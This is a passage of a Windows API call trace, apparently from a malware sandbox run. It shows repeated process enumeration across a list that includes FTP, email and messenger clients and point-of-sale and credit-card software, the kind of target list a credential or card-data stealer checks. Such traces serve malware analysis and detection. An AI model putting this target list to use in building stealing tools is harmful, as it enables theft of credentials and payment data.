szExeFile="svchost.exe")) returned 1 [0271.822] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0271.839] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x45, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0271.841] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0271.843] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0271.845] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0271.847] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0271.849] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0271.851] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0271.853] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0271.942] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0271.943] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0271.945] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0271.947] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0271.951] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0271.953] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0271.954] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0271.956] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0271.957] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0271.959] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0271.960] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0271.962] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0271.964] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x670, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0271.969] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x428, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="degree_sing_pretty.exe")) returned 1 [0271.970] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="work-heavy.exe")) returned 1 [0271.972] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0271.973] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="real-new.exe")) returned 1 [0271.975] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="letter.exe")) returned 1 [0271.976] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightwhere.exe")) returned 1 [0271.978] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge_model_ready.exe")) returned 1 [0271.988] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fearfew.exe")) returned 1 [0271.990] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bag-begin-gas.exe")) returned 1 [0271.991] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="take whether.exe")) returned 1 [0271.993] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="common trade station.exe")) returned 1 [0271.997] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="small_money.exe")) returned 1 [0271.998] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazineofficialteach.exe")) returned 1 [0272.000] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="involve.exe")) returned 1 [0272.001] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious_free_generation.exe")) returned 1 [0272.003] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hair friend will.exe")) returned 1 [0272.004] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whose.exe")) returned 1 [0272.006] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0272.007] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0272.009] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0272.010] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0272.014] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0272.016] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0272.017] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0272.019] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0272.021] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0272.023] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0272.025] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0272.088] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0272.090] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0272.092] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0272.094] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0272.096] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0272.097] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0272.099] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0272.101] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0272.102] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0272.107] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0272.109] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0272.111] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0272.113] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0272.115] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0272.116] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0272.118] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0272.120] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0272.172] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0272.174] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0272.176] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0272.178] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0272.180] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0272.183] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0272.189] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0272.191] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0272.193] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0272.194] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0272.196] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0272.198] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0272.202] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0272.204] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0272.205] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0272.207] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="discussion.exe")) returned 1 [0272.209] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="styledesignbusiness.exe")) returned 1 [0272.210] Process32Next (in: hSnapshot=0x1018, 